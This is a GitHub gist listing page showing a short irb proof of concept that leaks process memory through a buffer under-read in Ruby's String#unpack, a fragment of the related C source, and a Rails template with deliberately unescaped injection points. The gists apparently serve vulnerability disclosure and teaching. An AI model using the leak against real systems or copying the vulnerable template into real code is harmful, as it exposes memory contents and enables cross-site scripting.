Skip to content

Instantly share code, notes, and snippets.

View paulblei's full-sized avatar

Paul paulblei

14 followers · 2 following
  • San Francisco
View GitHub Profile
@paulblei
paulblei / buffer-under-read-poc.sh
Created March 30, 2018 01:52
$ irb
irb(main):145:0> leak = 200; size = 2**64-1 - leak + 1 ; puts size ; "BUFF".unpack("@#{size}C#{leak+4}").map { |i| i&.chr }.join.hexdump
18446744073709551416
Offset Hex dump ASCII dump
-------- ----------------------------------------------- ------------------
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 65 08 93 20 00 00 00 00 |........e.. ....|
00000020 c0 7d 8c 50 97 7f 00 00 53 41 56 45 5f 48 49 53 |.}.P....SAVE_HIS|
@paulblei
paulblei / integer-overflow.rb
Created March 30, 2018 01:49
unsigned long ruby_strtoul(const char *str, char **endptr, int base);
#define STRTOUL(str, endptr, base) (ruby_strtoul((str), (endptr), (base)))
// ....
static VALUE
pack_pack(int argc, VALUE *argv, VALUE ary)
{
// ...
long len, idx, plen;
// ....
@paulblei
paulblei / vulnerable-templating.rb
Created March 8, 2018 17:14
Vulnerable Ruby on Rails templating
<div>
<h1>Blog post: <%= @post.title %></h1> (1)
<br />
<a href=“<%= @post.url %>”>Click here to see the full story</a> (2)
<script>
record_post_view(@post.id); (3)
</script>
<div id=“footer” <%= @post.footer_attr %>>&copy; 2018</div> (4)
</div>
@paulblei
paulblei / gist:3895176c30dbc47585084d776e688157
Created January 23, 2017 08:59
Test
test